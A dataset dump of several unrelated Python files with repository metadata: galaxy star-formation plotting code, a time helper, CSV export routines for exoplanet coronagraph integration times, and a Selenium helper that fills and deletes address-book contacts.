sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], label=labels[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[1], fmt='.', ms=5, mec='red', zorder=20, elinewidth=1)
sfr, sfr_error, sfr_z = create_points_and_error_by_z("SFR", no_spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
mstar, mstar_error, mstar_z = create_points_and_error_by_z("Mstar", no_spec_z_catalog, z_range[0] - max_z, z_range[1] + max_z)
if use_labels:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[2], label=labels[2], fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
else:
ax.errorbar(mstar, sfr, yerr=sfr_error, xerr=mstar_error, ecolor=colors[2], fmt='.', ms=5, mec='blue', zorder=20, elinewidth=1)
ax.set_title(str(np.round(z_range[0], 1)) + ' < Z < ' + str(np.round(z_range[1], 1)))
if use_labels:
handles, ax_labels = ax.get_legend_handles_labels()
f.legend(loc='best', handles=handles, labels=ax_labels, prop={'size': 6})
f.text(0.5, 0.01, 'Log(M*)', ha='center')
f.text(0.01, 0.5, 'Log(SFR)', va='center', rotation='vertical')
f.savefig(filename, bbox_inches='tight', dpi=300)
f.show()
def plot_leinerdt():
return NotImplementedError
def whitaker_main_sequence(z, mass_start, mass_end):
"""
Returns the main sequence fit for Mstar between mass_start and mass_end for a given Z from
Whitaker et al. 2014
:param z:
:param mass_start:
:param mass_end:
:return:
"""
mass_range = np.linspace(mass_start, mass_end, 100)
if z > 2.0: # Valid till 2.5
sfr = -19.99 + 3.44 * mass_range + -0.13 * mass_range ** 2
elif 1.5 < z <= 2.0:
sfr = -24.04 + 4.17 * mass_range + -0.16 * mass_range ** 2
elif 1.0 < z <= 1.5:
sfr = -26.03 + 4.62 * mass_range + -0.19 * mass_range ** 2
elif z <= 1.0: #Valid to 0.5
sfr = -27.4 + 5.02 * mass_range + -0.22 * mass_range ** 2
return mass_range, sfr
def schrieber_main_sequence(z, mass_start, mass_end):
""""
Returns the x and y values for the Schreiber C. et al. 2015 Main Sequence for galaxies
Because M* and SFR are given in log10 space anyway, need to do 10^value for linspace
But not for SFR output, because it equals log10(SFR) which is what is given
"""
r = np.log10(1 + z)
mass_range = np.linspace(mass_start, mass_end, 100)
m_0 = 0.5 # +-0.07
a_0 = 1.5 # +- 0.15
a_1 = 0.3 # +- 0.08
m_1 = 0.36 # +- 0.3
a_2 = 2.5 # +- 0.6
m_s = mass_range - 9.0
sfr = []
for m in m_s:
sfr.append((m - m_0 + a_0 * r - a_1 * (np.max([0, (m - m_1 - a_2 * r)]) ** 2)))
return mass_range, sfr
def create_points_and_error_by_z(column_base_name, initial_catalog, low_z, high_z, added="_1", z="z_1"):
z_mask = (initial_catalog[z] >= low_z) & (initial_catalog[z] <= high_z)
centerpoints = initial_catalog[z_mask][str(column_base_name + "_50"+added)]
lower_error = initial_catalog[z_mask][str(column_base_name + "_16"+added)]
upper_error = initial_catalog[z_mask][str(column_base_name + "_84"+added)]
z_values = initial_catalog[z_mask][z]
centerpoints = np.nan_to_num(centerpoints)
lower_error = np.nan_to_num(lower_error)
upper_error = np.nan_to_num(upper_error)
zero_mask = centerpoints != 0.0
centerpoints = centerpoints[zero_mask]
lower_error = centerpoints - lower_error[zero_mask]
upper_error = upper_error[zero_mask] - centerpoints
z_values = z_values[zero_mask]
error_bars = [lower_error, upper_error]
return centerpoints, error_bars, z_values
def create_points_and_error(column_base_name, initial_catalog):
centerpoints = initial_catalog[str(column_base_name + "_50_1")]
lower_error = initial_catalog[str(column_base_name + "_16_1")]
upper_error = initial_catalog[str(column_base_name + "_84_1")]
centerpoints = np.nan_to_num(centerpoints)
zero_mask = centerpoints != 0.0
centerpoints = centerpoints[zero_mask]
lower_error = centerpoints - lower_error[zero_mask]
upper_error = upper_error[zero_mask] - centerpoints
error_bars = [lower_error, upper_error]
return centerpoints, error_bars
| 44.773639
| 321
| 0.632024
| 2,403
| 15,626
| 3.86392
| 0.100291
| 0.030372
| 0.016586
| 0.038772
| 0.875498
| 0.856327
| 0.838449
| 0.830695
| 0.826817
| 0.8014
| 0
| 0.040363
| 0.231025
| 15,626
| 348
| 322
| 44.902299
| 0.732357
| 0.086394
| 0
| 0.744681
| 0
| 0
| 0.05088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046809
| false
| 0
| 0.008511
| 0.017021
| 0.089362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41449bf429453acecccfca15ce692d4a67de1f14
| 81
|
py
|
Python
|
Python/utils.py
|
Nitaym/playcorder
|
69c45abaefe2ad027703a93baf20358aa2472757
|
[
"MIT"
] | null | null | null |
Python/utils.py
|
Nitaym/playcorder
|
69c45abaefe2ad027703a93baf20358aa2472757
|
[
"MIT"
] | null | null | null |
Python/utils.py
|
Nitaym/playcorder
|
69c45abaefe2ad027703a93baf20358aa2472757
|
[
"MIT"
] | null | null | null |
import time
def current_milli_time():
return int(round(time.time() * 1000))
| 16.2
| 41
| 0.703704
| 12
| 81
| 4.583333
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0.160494
| 81
| 4
| 42
| 20.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
416700267cefc26aaa1867147bda64a7b5661a8b
| 15,239
|
py
|
Python
|
scripts/store_csv_file.py
|
hsergi/Roman_Coronagraph_ETC
|
b2cfb42d1d74cdcc1a65efeb7a78c904f9cee235
|
[
"Apache-2.0"
] | 1
|
2021-11-16T21:29:10.000Z
|
2021-11-16T21:29:10.000Z
|
scripts/store_csv_file.py
|
hsergi/Roman_Coronagraph_ETC
|
b2cfb42d1d74cdcc1a65efeb7a78c904f9cee235
|
[
"Apache-2.0"
] | null | null | null |
scripts/store_csv_file.py
|
hsergi/Roman_Coronagraph_ETC
|
b2cfb42d1d74cdcc1a65efeb7a78c904f9cee235
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Global constant
from config import INSTALLATION_PATH
# Generic packages
import os
import numpy as np
import pandas as pd
def store_csv_file_acc(starNameCommon, koGood, len_koEvaltimes, \
CGI_epoch0, csvFileName):
"""
PURPOSE
-------
Store the accessibility of the targets
"""
# Create a data frame:
# Star name target 1 (average, %) target 1 ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
if os.path.exists(dir_csv) == False:
os.mkdir(dir_csv)
dictCI = {}
if len(starNameCommon) == 1:
dictCI[f'{starNameCommon[0]:s} (average, %)'] = \
np.round(np.sum(koGood) / len_koEvaltimes * 100, 2)
dictCI[f'{starNameCommon[0]:s} (days after {CGI_epoch0:.4f})'] = \
koGood
else:
for star in range(len(starNameCommon)):
dictCI[f'{starNameCommon[star]:s} (average, %)'] = \
np.round(np.sum(koGood[star]) / len_koEvaltimes * 100, 2)
dictCI[f'{starNameCommon[star]:s} (days after {CGI_epoch0:.4f})'] = \
koGood[star]
df = pd.DataFrame.from_dict(dictCI)
# Only show the average on the first row
for star in range(len(starNameCommon)):
df[f'{starNameCommon[star]:s} (average, %)'][1:] = np.nan
if csvFileName.find('.') < 1:
csvFileName += '.csv'
csvFileName = 'accessibility_' + csvFileName
df.to_csv(dir_csv+csvFileName, header=True, encoding='utf-8')
def store_csv_file_sl(filterList, kppList, PNameFilter, WA, d, I,
FR_NF_Imager, FR_Amici_Spec, FR_WF_Imager, SNRList,
intTimeFilterHours, csvFileName):
"""
PURPOSE
-------
Script that stores the estimated integration times of self-luminous
exoplanets as a CSV file
"""
# Create the 2-dimensional data frame:
# Planet name Planet 1 Planet 2 ...
# WA (mas)
# d (AU)
# I (deg)
# Filter (kpp=...)
# Flux ratio
# TimeToSNR# ... (hours)
# ...
# TimeToSNR# ... (hours)
# Filter (kpp=...)
# ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
if os.path.exists(dir_csv) == False:
os.mkdir(dir_csv)
dictCI = {'Planet name': [],
'WA (mas)': [],
'd (AU)': [],
'I (deg)': []}
for planet in range(len(PNameFilter)):
dictCI['Planet name'].append(PNameFilter[planet][0])
dictCI['WA (mas)'].append(WA[planet].value * 1000)
dictCI['d (AU)'].append(d[planet].value)
dictCI['I (deg)'].append(I[planet].value)
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_NF_Imager' \
or filterList[filter] == 'OPTI_NF_Imager') \
and not np.isnan(np.sum(FR_NF_Imager)):
dictCI['Flux ratio (NF)'] = FR_NF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_Amici_Spec' \
or filterList[filter] == 'OPTI_Amici_Spec') \
and not np.isnan(np.sum(FR_Amici_Spec)):
dictCI['Flux ratio (Spec)'] = FR_Amici_Spec
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_WF_Imager' \
or filterList[filter] == 'OPTI_WF_Imager') \
and not np.isnan(np.sum(FR_WF_Imager)):
dictCI['Flux ratio (WF)'] = FR_WF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
df = pd.DataFrame.from_dict(dictCI)
df = df.T
if csvFileName.find('.') < 1:
csvFileName += '.csv'
df.to_csv(dir_csv+csvFileName, header=False, encoding='utf-8')
def store_csv_file_rv(filterList, kppList, PName,
dayEpochBestTime, waMasBestTime, fRatioBestTime,
SNRList, intTimeBestHours, SNRPlanetMax,
intTimeSNRMax, csvFileName):
"""
PURPOSE:
Script that stores the estimated integration times of reflected light
exoplanets as a CSV file
"""
# Create the 2-dimensional data frame:
# Planet name Planet 1 Planet 2 ...
# Filter (kpp=...)
# Day of Mission
# WA (mas)
# Flux ratio
# SNRMax
# TimetoSNRMax (hours)
# TimeToSNR# ... (hours)
# ...
# TimeToSNR# ... (hours)
# Filter (kpp=...)
# Day of Mission
# WA (mas)
# ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
if os.path.exists(dir_csv) == False:
os.mkdir(dir_csv)
dictCI = {'Planet name': []}
for planet in range(len(PName)):
dictCI['Planet name'].append(PName[planet])
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_NF_Imager' \
or filterList[filter] == 'OPTI_NF_Imager'):
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PName)
dictCI[f'DoM_{filterList[filter]:s}'] = \
np.round(dayEpochBestTime[:, filter, 0, 1], decimals=1)
dictCI[f'WA_{filterList[filter]:s} (mas)'] = \
np.round(waMasBestTime[:,filter, 0, 1], decimals=1)
dictCI[f'FR_{filterList[filter]:s}'] = \
fRatioBestTime[:,filter, 0, 1]
dictCI[f'SNRMax_{filterList[filter]:s}'] = \
SNRPlanetMax[:,filter]
dictCI[f'T_{filterList[filter]:s}_SNRMax (hours)'] = \
np.round(intTimeSNRMax[:,filter], decimals=3)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PName)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeBestHours[planet][filter][snr],
decimals=3))
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_Amici_Spec' \
or filterList[filter] == 'OPTI_Amici_Spec'):
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PName)
dictCI[f'DoM_{filterList[filter]:s}'] = \
np.round(dayEpochBestTime[:, filter, 0, 1], decimals=1)
dictCI[f'WA_{filterList[filter]:s} (mas)'] = \
np.round(waMasBestTime[:,filter, 0, 1], decimals=1)
dictCI[f'FR_{filterList[filter]:s}'] = \
fRatioBestTime[:,filter, 0, 1]
dictCI[f'SNRMax_{filterList[filter]:s}'] = \
SNRPlanetMax[:,filter]
dictCI[f'T_{filterList[filter]:s}_SNRMax (hours)'] = \
np.round(intTimeSNRMax[:,filter], decimals=3)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PName)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeBestHours[planet][filter][snr],
decimals=3))
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_WF_Imager' \
or filterList[filter] == 'OPTI_WF_Imager'):
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PName)
dictCI[f'DoM_{filterList[filter]:s}'] = \
np.round(dayEpochBestTime[:, filter, 0, 1], decimals=1)
dictCI[f'WA_{filterList[filter]:s} (mas)'] = \
np.round(waMasBestTime[:,filter, 0, 1], decimals=1)
dictCI[f'FR_{filterList[filter]:s}'] = \
fRatioBestTime[:,filter, 0, 1]
dictCI[f'SNRMax_{filterList[filter]:s}'] = \
SNRPlanetMax[:,filter]
dictCI[f'T_{filterList[filter]:s}_SNRMax (hours)'] = \
np.round(intTimeSNRMax[:,filter], decimals=3)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PName)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeBestHours[planet][filter][snr],
decimals=3))
df = pd.DataFrame.from_dict(dictCI)
df = df.T
if csvFileName.find('.') < 1:
csvFileName += '.csv'
df.to_csv(dir_csv+csvFileName, header=False, encoding='utf-8')
def store_csv_file_ed(filterList, kppList, PNameFilter, WA,
FR_NF_Imager, FR_Amici_Spec, FR_WF_Imager, SNRList,
intTimeFilterHours, csvFileName):
"""
PURPOSE:
Script that stores the estimated integration times of exo-dust
targets as a CSV file
"""
# Create the 2-dimensional data frame:
# Planet name Planet 1 Planet 2 ...
# WA (mas)
# Filter (kpp=...)
# Flux ratio
# TimeToSNR# ... (hours)
# ...
# TimeToSNR# ... (hours)
# Filter (kpp=...)
# ...
# Create the folder where the figures will be stored
dir_csv = INSTALLATION_PATH
if dir_csv[-1] != '/':
dir_csv += '/output/csv/'
else:
dir_csv += 'output/csv/'
if os.path.exists(dir_csv) == False:
os.mkdir(dir_csv)
dictCI = {'Disk name': [],
'WA (mas)': []}
for planet in range(len(PNameFilter)):
dictCI['Disk name'].append(PNameFilter[planet][0])
dictCI['WA (mas)'].append(WA[planet].value * 1000)
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_NF_Imager' \
or filterList[filter] == 'OPTI_NF_Imager') \
and not np.isnan(np.sum(FR_NF_Imager)):
dictCI['Flux ratio (NF)'] = FR_NF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
f'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
f'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_Amici_Spec' \
or filterList[filter] == 'OPTI_Amici_Spec') \
and not np.isnan(np.sum(FR_Amici_Spec)):
dictCI['Flux ratio (Spec)'] = FR_Amici_Spec
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_WF_Imager' \
or filterList[filter] == 'OPTI_WF_Imager') \
and not np.isnan(np.sum(FR_WF_Imager)):
dictCI['Flux ratio (WF)'] = FR_WF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
df = pd.DataFrame.from_dict(dictCI)
df = df.T
if csvFileName.find('.') < 1:
csvFileName += '.csv'
df.to_csv(dir_csv+csvFileName, header=False, encoding='utf-8')
| 41.865385
| 81
| 0.520572
| 1,726
| 15,239
| 4.467555
| 0.093279
| 0.124497
| 0.072753
| 0.049021
| 0.901829
| 0.891583
| 0.866684
| 0.819349
| 0.819349
| 0.819349
| 0
| 0.011927
| 0.317737
| 15,239
| 363
| 82
| 41.980716
| 0.72973
| 0.096004
| 0
| 0.843284
| 0
| 0
| 0.201967
| 0.108322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0
| 0.014925
| 0
| 0.029851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41c4cbd44db0a608ee50a578fdc7ae6cac7bcf96
| 9,413
|
py
|
Python
|
fixture/contact.py
|
LenaNaum4ik/python_training
|
5d4a5941b703bef5fe7a573e5bc3713aed34749b
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
LenaNaum4ik/python_training
|
5d4a5941b703bef5fe7a573e5bc3713aed34749b
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
LenaNaum4ik/python_training
|
5d4a5941b703bef5fe7a573e5bc3713aed34749b
|
[
"Apache-2.0"
] | null | null | null |
class ContactHelper:
def __init__(self, app):
self.app = app
def create(self, contact):
wd = self.app.wd
# init contact creation
wd.find_element_by_link_text("add new").click()
# fill contact form
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nickname)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(contact.title)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(contact.company)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(contact.homepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").click()
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").click()
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(contact.notes)
# submit group creation
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
def change_first_contact (self, contact):
wd = self.app.wd
# select first contact
wd.find_element_by_name("selected[]").click()
# init contact change
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
# fill contact form
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nickname)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(contact.title)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(contact.company)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(contact.homepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").click()
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").click()
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(contact.notes)
# submit contact change
wd.find_element_by_name("update").click()
def delete_first_contact(self):
wd = self.app.wd
#select first contact
wd.find_element_by_name("selected[]").click()
#submit deletion
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
| 53.482955
| 104
| 0.673324
| 1,347
| 9,413
| 4.342984
| 0.058649
| 0.146667
| 0.317778
| 0.366667
| 0.959829
| 0.952991
| 0.937778
| 0.937778
| 0.937778
| 0.92547
| 0
| 0.008888
| 0.163285
| 9,413
| 175
| 105
| 53.788571
| 0.733875
| 0.018804
| 0
| 0.921569
| 0
| 0
| 0.178258
| 0.093306
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026144
| false
| 0
| 0
| 0
| 0.03268
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
68bdf455d2dfa379e3aa734bb14d188f59931f63
| 18,401
|
py
|
Python
|
forecasting/mid_term_forecasting.py
|
Matrixeigs/energy_management_system
|
b2af6a3cfa71173f33d798e943f605d802aed19f
|
[
"MIT"
] | 68
|
2017-11-21T02:49:11.000Z
|
2022-03-25T07:14:42.000Z
|
forecasting/mid_term_forecasting.py
|
yifeili/energy_management_system
|
b2af6a3cfa71173f33d798e943f605d802aed19f
|
[
"MIT"
] | null | null | null |
forecasting/mid_term_forecasting.py
|
yifeili/energy_management_system
|
b2af6a3cfa71173f33d798e943f605d802aed19f
|
[
"MIT"
